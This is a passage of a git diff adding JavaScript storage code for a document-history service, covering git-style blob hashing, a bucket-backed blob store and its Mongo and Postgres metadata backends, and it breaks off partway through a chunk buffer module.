b/services/history-v1/storage/lib/batch_blob_store.js new file mode 100644 index 0000000..af90b2e --- /dev/null +++ b/services/history-v1/storage/lib/batch_blob_store.js @@ -0,0 +1,40 @@ +'use strict' + +const BPromise = require('bluebird') + +/** + * @constructor + * @param {BlobStore} blobStore + * @classdesc + * Wrapper for BlobStore that pre-fetches blob metadata to avoid making one + * database call per blob lookup. + */ +function BatchBlobStore(blobStore) { + this.blobStore = blobStore + this.blobs = new Map() +} + +/** + * Pre-fetch metadata for the given blob hashes. + * + * @param {Array.<string>} hashes + * @return {Promise} + */ +BatchBlobStore.prototype.preload = function batchBlobStorePreload(hashes) { + return BPromise.each(this.blobStore.getBlobs(hashes), blob => { + this.blobs.set(blob.getHash(), blob) + }) +} + +/** + * @see BlobStore#getBlob + */ +BatchBlobStore.prototype.getBlob = BPromise.method( + function batchBlobStoreGetBlob(hash) { + const blob = this.blobs.get(hash) + if (blob) return blob + return this.blobStore.getBlob(hash) + } +) + +module.exports = BatchBlobStore diff --git a/services/history-v1/storage/lib/blob_hash.js b/services/history-v1/storage/lib/blob_hash.js new file mode 100644 index 0000000..6309637 --- /dev/null +++ b/services/history-v1/storage/lib/blob_hash.js @@ -0,0 +1,80 @@ +/** @module */ +'use strict' + +const BPromise = require('bluebird') +const fs = BPromise.promisifyAll(require('node:fs')) +const crypto = require('node:crypto') +const { pipeline } = require('node:stream') +const assert = require('./assert') + +function getGitBlobHeader(byteLength) { + return 'blob ' + byteLength + '\x00' +} + +function getBlobHash(byteLength) { + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update(getGitBlobHeader(byteLength)) + return hash +} + +/** + * Compute the git blob hash for a blob from a readable stream of its content. 
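+ *
+ * The digest matches `git hash-object`: it is the SHA-1 of the header
+ * "blob <byteLength>\x00" followed by the content, so an 11-byte file
+ * containing "hello world" hashes the bytes "blob 11\x00hello world".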
+ *
+ * @function
+ * @param {number} byteLength
+ * @param {stream.Readable} stream
+ * @return {Promise.<string>} hexadecimal SHA-1 hash
+ */
+exports.fromStream = BPromise.method(
+  function blobHashFromStream(byteLength, stream) {
+    assert.integer(byteLength, 'blobHash: bad byteLength')
+    assert.object(stream, 'blobHash: bad stream')
+
+    const hash = getBlobHash(byteLength)
+    return new BPromise(function (resolve, reject) {
+      pipeline(stream, hash, function (err) {
+        if (err) {
+          reject(err)
+        } else {
+          hash.end()
+          resolve(hash.read())
+        }
+      })
+    })
+  }
+)
+
+/**
+ * Compute the git blob hash for a blob with the given string content.
+ *
+ * @param {string} string
+ * @return {string} hexadecimal SHA-1 hash
+ */
+exports.fromString = function blobHashFromString(string) {
+  assert.string(string, 'blobHash: bad string')
+  const hash = getBlobHash(Buffer.byteLength(string))
+  hash.update(string, 'utf8')
+  hash.end()
+  return hash.read()
+}
+
+/**
+ * Compute the git blob hash for the content of a file.
+ *
+ * @param {string} pathname
+ * @return {Promise.<string>} hexadecimal SHA-1 hash
+ */
+exports.fromFile = function blobHashFromFile(pathname) {
+  assert.string(pathname, 'blobHash: bad pathname')
+
+  function getByteLengthOfFile() {
+    return fs.statAsync(pathname).then(stat => stat.size)
+  }
+
+  const fromStream = this.fromStream
+  return getByteLengthOfFile(pathname).then(function (byteLength) {
+    const stream = fs.createReadStream(pathname)
+    return fromStream(byteLength, stream)
+  })
}
diff --git a/services/history-v1/storage/lib/blob_store/index.js b/services/history-v1/storage/lib/blob_store/index.js
new file mode 100644
index 0000000..b4a7d16
--- /dev/null
+++ b/services/history-v1/storage/lib/blob_store/index.js
@@ -0,0 +1,433 @@
+'use strict'
+
+const config = require('config')
+const fs = require('node:fs')
+const isValidUtf8 = require('utf-8-validate')
+const { ReadableString } = require('@overleaf/stream-utils')
+
+const core = require('overleaf-editor-core')
+const objectPersistor = require('@overleaf/object-persistor')
+const OError = require('@overleaf/o-error')
+const Blob = core.Blob
+const TextOperation = core.TextOperation
+const containsNonBmpChars = core.util.containsNonBmpChars
+
+const assert = require('../assert')
+const blobHash = require('../blob_hash')
+const mongodb = require('../mongodb')
+const persistor = require('../persistor')
+const projectKey = require('../project_key')
+const streams = require('../streams')
+const postgresBackend = require('./postgres')
+const mongoBackend = require('./mongo')
+const logger = require('@overleaf/logger')
+
+/** @import { Readable } from 'stream' */
+
+const GLOBAL_BLOBS = new Map()
+
+function makeGlobalKey(hash) {
+  return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}`
+}
+
+function makeProjectKey(projectId, hash) {
+  return `${projectKey.format(projectId)}/${hash.slice(0, 2)}/${hash.slice(2)}`
+}
+
+async function uploadBlob(projectId, blob, stream, opts = {}) {
+  const bucket = config.get('blobStore.projectBucket')
+  const key = makeProjectKey(projectId, blob.getHash())
+  logger.debug({ projectId, blob }, 'uploadBlob started')
+  try {
+    await persistor.sendStream(bucket, key, stream, {
+      contentType: 'application/octet-stream',
+      ...opts,
+    })
+  } finally {
+    logger.debug({ projectId, blob }, 'uploadBlob finished')
+  }
+}
+
+function getBlobLocation(projectId, hash) {
+  if (GLOBAL_BLOBS.has(hash)) {
+    return {
+      bucket: config.get('blobStore.globalBucket'),
+      key: makeGlobalKey(hash),
+    }
+  } else {
+    return {
+ bucket: config.get('blobStore.projectBucket'), + key: makeProjectKey(projectId, hash), + } + } +} + +/** + * Returns the appropriate backend for the given project id + * + * Numeric ids use the Postgres backend. + * Strings of 24 characters use the Mongo backend. + */ +function getBackend(projectId) { + if (assert.POSTGRES_ID_REGEXP.test(projectId)) { + return postgresBackend + } else if (assert.MONGO_ID_REGEXP.test(projectId)) { + return mongoBackend + } else { + throw new OError('bad project id', { projectId }) + } +} + +async function makeBlobForFile(pathname) { + const { size: byteLength } = await fs.promises.stat(pathname) + const hash = await blobHash.fromStream( + byteLength, + fs.createReadStream(pathname) + ) + return new Blob(hash, byteLength) +} + +async function getStringLengthOfFile(byteLength, pathname) { + // We have to read the file into memory to get its UTF-8 length, so don't + // bother for files that are too large for us to edit anyway. + if (byteLength > Blob.MAX_EDITABLE_BYTE_LENGTH_BOUND) { + return null + } + + // We need to check if the file contains nonBmp or null characters + let data = await fs.promises.readFile(pathname) + if (!isValidUtf8(data)) return null + data = data.toString() + if (data.length > TextOperation.MAX_STRING_LENGTH) return null + if (containsNonBmpChars(data)) return null + if (data.indexOf('\x00') !== -1) return null + return data.length +} + +async function deleteBlobsInBucket(projectId) { + const bucket = config.get('blobStore.projectBucket') + const prefix = `${projectKey.format(projectId)}/` + logger.debug({ projectId }, 'deleteBlobsInBucket started') + try { + await persistor.deleteDirectory(bucket, prefix) + } finally { + logger.debug({ projectId }, 'deleteBlobsInBucket finished') + } +} + +async function loadGlobalBlobs() { + const blobs = await mongodb.globalBlobs.find() + for await (const blob of blobs) { + GLOBAL_BLOBS.set(blob._id, { + blob: new Blob(blob._id, blob.byteLength, blob.stringLength), + demoted: Boolean(blob.demoted), + }) + } +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<string|number>} projectIds + * @return {Promise<{nBlobs:number, blobs:Map<string,Array<core.Blob>>}>} + */ +async function getProjectBlobsBatch(projectIds) { + const mongoProjects = [] + const postgresProjects = [] + for (const projectId of projectIds) { + if (typeof projectId === 'number') { + postgresProjects.push(projectId) + } else { + mongoProjects.push(projectId) + } + } + const [ + { nBlobs: nBlobsPostgres, blobs: blobsPostgres }, + { nBlobs: nBlobsMongo, blobs: blobsMongo }, + ] = await Promise.all([ + postgresBackend.getProjectBlobsBatch(postgresProjects), + mongoBackend.getProjectBlobsBatch(mongoProjects), + ]) + for (const [id, blobs] of blobsPostgres.entries()) { + blobsMongo.set(id.toString(), blobs) + } + return { nBlobs: nBlobsPostgres + nBlobsMongo, blobs: blobsMongo } +} + +/** + * @classdesc + * Fetch and store the content of files using content-addressable hashing. The + * blob store manages both content and metadata (byte and UTF-8 length) for + * blobs. 
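+ *
+ * Typical usage (editor's sketch; the project id is hypothetical):
+ *
+ *   const blobStore = new BlobStore('507f1f77bcf86cd799439011')
+ *   const blob = await blobStore.putString('contents')
+ *   const text = await blobStore.getString(blob.getHash())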
+ */
+class BlobStore {
+  /**
+   * @constructor
+   * @param {string} projectId the project for which we'd like to find blobs
+   */
+  constructor(projectId) {
+    assert.projectId(projectId)
+    this.projectId = projectId
+    this.backend = getBackend(this.projectId)
+  }
+
+  /**
+   * Set up the initial data structure for a given project
+   */
+  async initialize() {
+    await this.backend.initialize(this.projectId)
+  }
+
+  /**
+   * Write a blob, if one does not already exist, with the given UTF-8 encoded
+   * string content.
+   *
+   * @param {string} string
+   * @return {Promise.<core.Blob>}
+   */
+  async putString(string) {
+    assert.string(string, 'bad string')
+    const hash = blobHash.fromString(string)
+
+    const existingBlob = await this._findBlobBeforeInsert(hash)
+    if (existingBlob != null) {
+      return existingBlob
+    }
+    const newBlob = new Blob(hash, Buffer.byteLength(string), string.length)
+    // Note: the ReadableString is to work around a bug in the AWS SDK: it won't
+    // allow Body to be blank.
+    await uploadBlob(this.projectId, newBlob, new ReadableString(string))
+    await this.backend.insertBlob(this.projectId, newBlob)
+    return newBlob
+  }
+
+  /**
+   * Write a blob, if one does not already exist, with the given file (usually a
+   * temporary file).
+   *
+   * @param {string} pathname
+   * @return {Promise<core.Blob>}
+   */
+  async putFile(pathname) {
+    assert.string(pathname, 'bad pathname')
+    const newBlob = await makeBlobForFile(pathname)
+    const existingBlob = await this._findBlobBeforeInsert(newBlob.getHash())
+    if (existingBlob != null) {
+      return existingBlob
+    }
+    const stringLength = await getStringLengthOfFile(
+      newBlob.getByteLength(),
+      pathname
+    )
+    newBlob.setStringLength(stringLength)
+    await this.putBlob(pathname, newBlob)
+    return newBlob
+  }
+
+  /**
+   * Write a new blob, the stringLength must have been added already. It should
+   * have been checked that the blob does not exist yet. Consider using
+   * {@link putFile} instead of this lower-level method.
+   *
+   * @param {string} pathname
+   * @param {core.Blob} finalizedBlob
+   * @return {Promise<void>}
+   */
+  async putBlob(pathname, finalizedBlob) {
+    await uploadBlob(
+      this.projectId,
+      finalizedBlob,
+      fs.createReadStream(pathname)
+    )
+    await this.backend.insertBlob(this.projectId, finalizedBlob)
+  }
+
+  /**
+   * Stores an object as a JSON string in a blob.
+   *
+   * @param {object} obj
+   * @returns {Promise.<core.Blob>}
+   */
+  async putObject(obj) {
+    assert.object(obj, 'bad object')
+    const string = JSON.stringify(obj)
+    return await this.putString(string)
+  }
+
+  /**
+   * Fetch a blob's content by its hash as a UTF-8 encoded string.
+   *
+   * @param {string} hash hexadecimal SHA-1 hash
+   * @return {Promise.<string>} promise for the content of the file
+   */
+  async getString(hash) {
+    assert.blobHash(hash, 'bad hash')
+
+    const projectId = this.projectId
+    logger.debug({ projectId, hash }, 'getString started')
+    try {
+      const stream = await this.getStream(hash)
+      const buffer = await streams.readStreamToBuffer(stream)
+      return buffer.toString()
+    } finally {
+      logger.debug({ projectId, hash }, 'getString finished')
+    }
+  }
+
+  /**
+   * Fetch a JSON encoded blob by its hash and deserialize it.
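+   *
+   * Editor's sketch, assuming the hash was produced by putObject():
+   *
+   *   const value = await blobStore.getObject(hash) // parsed JSON value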
+   *
+   * @template [T=unknown]
+   * @param {string} hash hexadecimal SHA-1 hash
+   * @return {Promise.<T>} promise for the content of the file
+   */
+  async getObject(hash) {
+    assert.blobHash(hash, 'bad hash')
+    const projectId = this.projectId
+    logger.debug({ projectId, hash }, 'getObject started')
+    try {
+      const jsonString = await this.getString(hash)
+      const object = JSON.parse(jsonString)
+      return object
+    } catch (error) {
+      // Maybe this blob is gzipped. Try to gunzip it.
+      // TODO: Remove once we've ensured this is not reached
+      const stream = await this.getStream(hash)
+      const buffer = await streams.gunzipStreamToBuffer(stream)
+      const object = JSON.parse(buffer.toString())
+      logger.warn('getObject: Gzipped object in BlobStore')
+      return object
+    } finally {
+      logger.debug({ projectId, hash }, 'getObject finished')
+    }
+  }
+
+  /**
+   * Fetch a blob by its hash as a stream.
+   *
+   * Note that, according to the AWS SDK docs, this does not retry after initial
+   * failure, so the caller must be prepared to retry on errors, if appropriate.
+   *
+   * @param {string} hash hexadecimal SHA-1 hash
+   * @param {Object} opts
+   * @return {Promise.<Readable>} a stream to read the file
+   */
+  async getStream(hash, opts = {}) {
+    assert.blobHash(hash, 'bad hash')
+
+    const { bucket, key } = getBlobLocation(this.projectId, hash)
+    try {
+      const stream = await persistor.getObjectStream(bucket, key, opts)
+      return stream
+    } catch (err) {
+      if (err instanceof objectPersistor.Errors.NotFoundError) {
+        throw new Blob.NotFoundError(hash)
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Read a blob metadata record by hexadecimal hash.
+   *
+   * @param {string} hash hexadecimal SHA-1 hash
+   * @return {Promise<core.Blob | null>}
+   */
+  async getBlob(hash) {
+    assert.blobHash(hash, 'bad hash')
+    const globalBlob = GLOBAL_BLOBS.get(hash)
+    if (globalBlob != null) {
+      return globalBlob.blob
+    }
+    const blob = await this.backend.findBlob(this.projectId, hash)
+    return blob
+  }
+
+  async getBlobs(hashes) {
+    assert.array(hashes, 'bad hashes')
+    const nonGlobalHashes = []
+    const blobs = []
+    for (const hash of hashes) {
+      const globalBlob = GLOBAL_BLOBS.get(hash)
+      if (globalBlob != null) {
+        blobs.push(globalBlob.blob)
+      } else {
+        nonGlobalHashes.push(hash)
+      }
+    }
+    if (nonGlobalHashes.length === 0) {
+      return blobs // to avoid unnecessary database lookup
+    }
+    const projectBlobs = await this.backend.findBlobs(
+      this.projectId,
+      nonGlobalHashes
+    )
+    blobs.push(...projectBlobs)
+    return blobs
+  }
+
+  /**
+   * Retrieve all blobs associated with the project.
+   * @returns {Promise<core.Blob[]>} A promise that resolves to an array of blobs.
+   */
+  async getProjectBlobs() {
+    const projectBlobs = await this.backend.getProjectBlobs(this.projectId)
+    return projectBlobs
+  }
+
+  /**
+   * Delete all blobs that belong to the project.
+   */
+  async deleteBlobs() {
+    await Promise.all([
+      this.backend.deleteBlobs(this.projectId),
+      deleteBlobsInBucket(this.projectId),
+    ])
+  }
+
+  async _findBlobBeforeInsert(hash) {
+    const globalBlob = GLOBAL_BLOBS.get(hash)
+    if (globalBlob != null && !globalBlob.demoted) {
+      return globalBlob.blob
+    }
+    const blob = await this.backend.findBlob(this.projectId, hash)
+    return blob
+  }
+
+  /**
+   * Copy an existing sourceBlob in this project to a target project.
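+   *
+   * The object content is copied server-side via persistor.copyObject; only
+   * the metadata record is inserted through the target project's backend.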
+ * @param {Blob} sourceBlob + * @param {string} targetProjectId + * @return {Promise<void>} + */ + async copyBlob(sourceBlob, targetProjectId) { + assert.instance(sourceBlob, Blob, 'bad sourceBlob') + assert.projectId(targetProjectId, 'bad targetProjectId') + const hash = sourceBlob.getHash() + const sourceProjectId = this.projectId + const { bucket, key: sourceKey } = getBlobLocation(sourceProjectId, hash) + const destKey = makeProjectKey(targetProjectId, hash) + const targetBackend = getBackend(targetProjectId) + logger.debug({ sourceProjectId, targetProjectId, hash }, 'copyBlob started') + try { + await persistor.copyObject(bucket, sourceKey, destKey) + await targetBackend.insertBlob(targetProjectId, sourceBlob) + } finally { + logger.debug( + { sourceProjectId, targetProjectId, hash }, + 'copyBlob finished' + ) + } + } +} + +module.exports = { + BlobStore, + getProjectBlobsBatch, + loadGlobalBlobs, + makeProjectKey, + makeBlobForFile, + getStringLengthOfFile, + GLOBAL_BLOBS, +} diff --git a/services/history-v1/storage/lib/blob_store/mongo.js b/services/history-v1/storage/lib/blob_store/mongo.js new file mode 100644 index 0000000..9117382 --- /dev/null +++ b/services/history-v1/storage/lib/blob_store/mongo.js @@ -0,0 +1,437 @@ +// @ts-check +/** + * Mongo backend for the blob store. + * + * Blobs are stored in the projectHistoryBlobs collection. Each project has a + * document in that collection. That document has a "blobs" subdocument whose + * fields are buckets of blobs. The key of a bucket is the first three hex + * digits of the blob hash. The value of the bucket is an array of blobs that + * match the key. + * + * Buckets have a maximum capacity of 8 blobs. When that capacity is exceeded, + * blobs are stored in a secondary collection: the projectHistoryShardedBlobs + * collection. This collection shards blobs between 16 documents per project. + * The shard key is the first hex digit of the hash. The documents are also + * organized in buckets, but the bucket key is made of hex digits 2, 3 and 4. + */ + +const { Blob } = require('overleaf-editor-core') +const { ObjectId, Binary, MongoError, ReadPreference } = require('mongodb') +const assert = require('../assert') +const mongodb = require('../mongodb') + +const MAX_BLOBS_IN_BUCKET = 8 +const DUPLICATE_KEY_ERROR_CODE = 11000 + +/** + * @typedef {import('mongodb').ReadPreferenceLike} ReadPreferenceLike + */ + +/** + * Set up the data structures for a given project. + * @param {string} projectId + */ +async function initialize(projectId) { + assert.mongoId(projectId, 'bad projectId') + try { + await mongodb.blobs.insertOne({ + _id: new ObjectId(projectId), + blobs: {}, + }) + } catch (err) { + if (err instanceof MongoError && err.code === DUPLICATE_KEY_ERROR_CODE) { + return // ignore already initialized case + } + throw err + } +} + +/** + * Return blob metadata for the given project and hash. 
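+ *
+ * Editor's illustration: a hash beginning "abc..." is looked up in the
+ * bucket at Mongo path "blobs.abc"; if the hash is not found there and the
+ * bucket already holds MAX_BLOBS_IN_BUCKET entries, the lookup falls back
+ * to the sharded collection.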
+ * @param {string} projectId + * @param {string} hash + * @return {Promise<Blob | null>} + */ +async function findBlob(projectId, hash) { + assert.mongoId(projectId, 'bad projectId') + assert.blobHash(hash, 'bad hash') + + const bucket = getBucket(hash) + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 0, bucket: `$${bucket}` } } + ) + + if (result?.bucket == null) { + return null + } + + const record = result.bucket.find(blob => blob.h.toString('hex') === hash) + if (record == null) { + if (result.bucket.length >= MAX_BLOBS_IN_BUCKET) { + return await findBlobSharded(projectId, hash) + } else { + return null + } + } + return recordToBlob(record) +} + +/** + * Search in the sharded collection for blob metadata + * @param {string} projectId + * @param {string} hash + * @return {Promise<Blob | null>} + */ +async function findBlobSharded(projectId, hash) { + const [shard, bucket] = getShardedBucket(hash) + const id = makeShardedId(projectId, shard) + const result = await mongodb.shardedBlobs.findOne( + { _id: id }, + { projection: { _id: 0, blobs: `$${bucket}` } } + ) + if (result?.blobs == null) { + return null + } + const record = result.blobs.find(blob => blob.h.toString('hex') === hash) + if (!record) return null + return recordToBlob(record) +} + +/** + * Read multiple blob metadata records by hexadecimal hashes. + * @param {string} projectId + * @param {Array<string>} hashes + * @return {Promise<Array<Blob>>} + */ +async function findBlobs(projectId, hashes) { + assert.mongoId(projectId, 'bad projectId') + assert.array(hashes, 'bad hashes: not array') + hashes.forEach(function (hash) { + assert.blobHash(hash, 'bad hash') + }) + + // Build a set of unique buckets + const buckets = new Set(hashes.map(getBucket)) + + // Get buckets from Mongo + const projection = { _id: 0 } + for (const bucket of buckets) { + projection[bucket] = 1 + } + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection } + ) + + if (result?.blobs == null) { + return [] + } + + // Build blobs from the query results + const hashSet = new Set(hashes) + const blobs = [] + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + const hash = record.h.toString('hex') + if (hashSet.has(hash)) { + blobs.push(recordToBlob(record)) + hashSet.delete(hash) + } + } + } + + // If we haven't found all the blobs, look in the sharded collection + if (hashSet.size > 0) { + const shardedBlobs = await findBlobsSharded(projectId, hashSet) + blobs.push(...shardedBlobs) + } + + return blobs +} + +/** + * Search in the sharded collection for blob metadata. 
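+ *
+ * Lookups are grouped by shard key, so at most 16 sharded documents (one
+ * per leading hex digit of the hashes) are queried, in parallel.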
+ * @param {string} projectId + * @param {Set<string>} hashSet + * @return {Promise<Array<Blob>>} + */ +async function findBlobsSharded(projectId, hashSet) { + // Build a map of buckets by shard key + const bucketsByShard = new Map() + for (const hash of hashSet) { + const [shard, bucket] = getShardedBucket(hash) + let buckets = bucketsByShard.get(shard) + if (buckets == null) { + buckets = new Set() + bucketsByShard.set(shard, buckets) + } + buckets.add(bucket) + } + + // Make parallel requests to the shards that might contain the hashes we want + const requests = [] + for (const [shard, buckets] of bucketsByShard.entries()) { + const id = makeShardedId(projectId, shard) + const projection = { _id: 0 } + for (const bucket of buckets) { + projection[bucket] = 1 + } + const request = mongodb.shardedBlobs.findOne({ _id: id }, { projection }) + requests.push(request) + } + const results = await Promise.all(requests) + + // Build blobs from the query results + const blobs = [] + for (const result of results) { + if (result?.blobs == null) { + continue + } + + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + const hash = record.h.toString('hex') + if (hashSet.has(hash)) { + blobs.push(recordToBlob(record)) + } + } + } + } + return blobs +} + +/** + * Return metadata for all blobs in the given project + */ +async function getProjectBlobs(projectId) { + assert.mongoId(projectId, 'bad projectId') + + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 0 } } + ) + + if (!result) { + return [] + } + + // Build blobs from the query results + const blobs = [] + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + blobs.push(recordToBlob(record)) + } + } + + // Look for all possible sharded blobs + + const minShardedId = makeShardedId(projectId, '0') + const maxShardedId = makeShardedId(projectId, 'f') + // @ts-ignore We are using a custom _id here. + const shardedRecords = mongodb.shardedBlobs.find( + { + _id: { $gte: minShardedId, $lte: maxShardedId }, + }, + { projection: { _id: 0 } } + ) + + for await (const shardedRecord of shardedRecords) { + if (shardedRecord.blobs == null) { + continue + } + for (const bucket of Object.values(shardedRecord.blobs)) { + for (const record of bucket) { + blobs.push(recordToBlob(record)) + } + } + } + + return blobs +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<string>} projectIds + * @return {Promise<{ nBlobs: number, blobs: Map<string, Array<Blob>> }>} + */ +async function getProjectBlobsBatch(projectIds) { + for (const project of projectIds) { + assert.mongoId(project, 'bad projectId') + } + let nBlobs = 0 + const blobs = new Map() + if (projectIds.length === 0) return { nBlobs, blobs } + + // blobs + { + const cursor = await mongodb.blobs.find( + { _id: { $in: projectIds.map(projectId => new ObjectId(projectId)) } }, + { readPreference: ReadPreference.secondaryPreferred } + ) + for await (const record of cursor) { + const projectBlobs = Object.values(record.blobs).flat().map(recordToBlob) + blobs.set(record._id.toString(), projectBlobs) + nBlobs += projectBlobs.length + } + } + + // sharded blobs + { + // @ts-ignore We are using a custom _id here. 
+ const cursor = await mongodb.shardedBlobs.find( + { + _id: { + $gte: makeShardedId(projectIds[0], '0'), + $lte: makeShardedId(projectIds[projectIds.length - 1], 'f'), + }, + }, + { readPreference: ReadPreference.secondaryPreferred } + ) + for await (const record of cursor) { + const recordIdHex = record._id.toString('hex') + const recordProjectId = recordIdHex.slice(0, 24) + const projectBlobs = Object.values(record.blobs).flat().map(recordToBlob) + const found = blobs.get(recordProjectId) + if (found) { + found.push(...projectBlobs) + } else { + blobs.set(recordProjectId, projectBlobs) + } + nBlobs += projectBlobs.length + } + } + return { nBlobs, blobs } +} + +/** + * Add a blob's metadata to the blobs collection after it has been uploaded. + * @param {string} projectId + * @param {Blob} blob + */ +async function insertBlob(projectId, blob) { + assert.mongoId(projectId, 'bad projectId') + const hash = blob.getHash() + const bucket = getBucket(hash) + const record = blobToRecord(blob) + const result = await mongodb.blobs.updateOne( + { + _id: new ObjectId(projectId), + $expr: { + $lt: [{ $size: { $ifNull: [`$${bucket}`, []] } }, MAX_BLOBS_IN_BUCKET], + }, + }, + { + $addToSet: { [bucket]: record }, + } + ) + + if (result.matchedCount === 0) { + await insertRecordSharded(projectId, hash, record) + } +} + +/** + * Add a blob's metadata to the sharded blobs collection. + * @param {string} projectId + * @param {string} hash + * @param {Record} record + * @return {Promise<void>} + */ +async function insertRecordSharded(projectId, hash, record) { + const [shard, bucket] = getShardedBucket(hash) + const id = makeShardedId(projectId, shard) + await mongodb.shardedBlobs.updateOne( + { _id: id }, + { $addToSet: { [bucket]: record } }, + { upsert: true } + ) +} + +/** + * Delete all blobs for a given project. + * @param {string} projectId + */ +async function deleteBlobs(projectId) { + assert.mongoId(projectId, 'bad projectId') + await mongodb.blobs.deleteOne({ _id: new ObjectId(projectId) }) + const minShardedId = makeShardedId(projectId, '0') + const maxShardedId = makeShardedId(projectId, 'f') + await mongodb.shardedBlobs.deleteMany({ + // @ts-ignore We are using a custom _id here. + _id: { $gte: minShardedId, $lte: maxShardedId }, + }) +} + +/** + * Return the Mongo path to the bucket for the given hash. + * @param {string} hash + * @return {string} + */ +function getBucket(hash) { + return `blobs.${hash.slice(0, 3)}` +} + +/** + * Return the shard key and Mongo path to the bucket for the given hash in the + * sharded collection. + * @param {string} hash + * @return {[string, string]} + */ +function getShardedBucket(hash) { + const shard = hash.slice(0, 1) + const bucket = `blobs.${hash.slice(1, 4)}` + return [shard, bucket] +} + +/** + * Create an _id key for the sharded collection. + * @param {string} projectId + * @param {string} shard + * @return {Binary} + */ +function makeShardedId(projectId, shard) { + return new Binary(Buffer.from(`${projectId}0${shard}`, 'hex')) +} + +/** + * @typedef {Object} Record + * @property {Binary} h + * @property {number} b + * @property {number} [s] + */ + +/** + * Return the Mongo record for the given blob. + * @param {Blob} blob + * @return {Record} + */ +function blobToRecord(blob) { + const hash = blob.getHash() + const byteLength = blob.getByteLength() + const stringLength = blob.getStringLength() + return { + h: new Binary(Buffer.from(hash, 'hex')), + b: byteLength, + s: stringLength, + } +} + +/** + * Create a blob from the given Mongo record. 
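+ *
+ * Editor's illustration: { h: Binary(20-byte SHA-1), b: 1024, s: 1000 }
+ * becomes new Blob('<40 hex digits>', 1024, 1000).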
+ * @param {Record} record + * @return {Blob} + */ +function recordToBlob(record) { + return new Blob(record.h.toString('hex'), record.b, record.s) +} + +module.exports = { + initialize, + findBlob, + findBlobs, + getProjectBlobs, + getProjectBlobsBatch, + insertBlob, + deleteBlobs, +} diff --git a/services/history-v1/storage/lib/blob_store/postgres.js b/services/history-v1/storage/lib/blob_store/postgres.js new file mode 100644 index 0000000..1cedeec --- /dev/null +++ b/services/history-v1/storage/lib/blob_store/postgres.js @@ -0,0 +1,161 @@ +const { Blob } = require('overleaf-editor-core') +const assert = require('../assert') +const knex = require('../knex') + +/** + * Set up the initial data structures for a project + */ +async function initialize(projectId) { + // Nothing to do for Postgres +} + +/** + * Return blob metadata for the given project and hash + */ +async function findBlob(projectId, hash) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + assert.blobHash(hash, 'bad hash') + + const binaryHash = hashToBuffer(hash) + const record = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where({ + project_id: projectId, + hash_bytes: binaryHash, + }) + .first() + return recordToBlob(record) +} + +/** + * Read multiple blob metadata records by hexadecimal hashes. + * + * @param {Array.<string>} hashes hexadecimal SHA-1 hashes + * @return {Promise.<Array.<Blob?>>} no guarantee on order + */ +async function findBlobs(projectId, hashes) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + assert.array(hashes, 'bad hashes: not array') + hashes.forEach(function (hash) { + assert.blobHash(hash, 'bad hash') + }) + + const binaryHashes = hashes.map(hashToBuffer) + + const records = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where('project_id', projectId) + .whereIn('hash_bytes', binaryHashes) + + const blobs = records.map(recordToBlob) + return blobs +} + +/** + * Return metadata for all blobs in the given project + */ +async function getProjectBlobs(projectId) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + const records = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where({ + project_id: projectId, + }) + + const blobs = records.map(recordToBlob) + return blobs +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<number>} projectIds + * @return {Promise<{ nBlobs: number, blobs: Map<number, Array<Blob>> }>} + */ +async function getProjectBlobsBatch(projectIds) { + for (const projectId of projectIds) { + assert.integer(projectId, 'bad projectId') + } + let nBlobs = 0 + const blobs = new Map() + if (projectIds.length === 0) return { nBlobs, blobs } + + const cursor = knex('project_blobs') + .select('project_id', 'hash_bytes', 'byte_length', 'string_length') + .whereIn('project_id', projectIds) + .stream() + for await (const record of cursor) { + const found = blobs.get(record.project_id) + if (found) { + found.push(recordToBlob(record)) + } else { + blobs.set(record.project_id, [recordToBlob(record)]) + } + nBlobs++ + } + return { nBlobs, blobs } +} + +/** + * Add a blob's metadata to the blobs table after it has been uploaded. 
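+ *
+ * Re-inserting an existing blob is a no-op: conflicts on
+ * (project_id, hash_bytes) are ignored.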
+ */ +async function insertBlob(projectId, blob) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + await knex('project_blobs') + .insert(blobToRecord(projectId, blob)) + .onConflict(['project_id', 'hash_bytes']) + .ignore() +} + +/** + * Deletes all blobs for a given project + */ +async function deleteBlobs(projectId) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + await knex('project_blobs').where('project_id', projectId).delete() +} + +function blobToRecord(projectId, blob) { + return { + project_id: projectId, + hash_bytes: hashToBuffer(blob.hash), + byte_length: blob.getByteLength(), + string_length: blob.getStringLength(), + } +} + +function recordToBlob(record) { + if (!record) return + return new Blob( + hashFromBuffer(record.hash_bytes), + record.byte_length, + record.string_length + ) +} + +function hashToBuffer(hash) { + if (!hash) return + return Buffer.from(hash, 'hex') +} + +function hashFromBuffer(buffer) { + if (!buffer) return + return buffer.toString('hex') +} + +module.exports = { + initialize, + findBlob, + findBlobs, + getProjectBlobs, + getProjectBlobsBatch, + insertBlob, + deleteBlobs, +} diff --git a/services/history-v1/storage/lib/chunk_buffer/index.js b/services/history-v1/storage/lib/chunk_buffer/index.js new file mode 100644 index 0000000..fe30b99 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_buffer/index.js @@ -0,0 +1,40 @@ +'use strict' + +/** + * @module storage/lib/chunk_buffer + */ + +const chunkStore = require('../chunk_store') +const redisBackend = require('../chunk_store/redis') +const metrics = require('@overleaf/metrics') +/** + * Load the latest Chunk stored for a project, including blob metadata. + * + * @param {string} 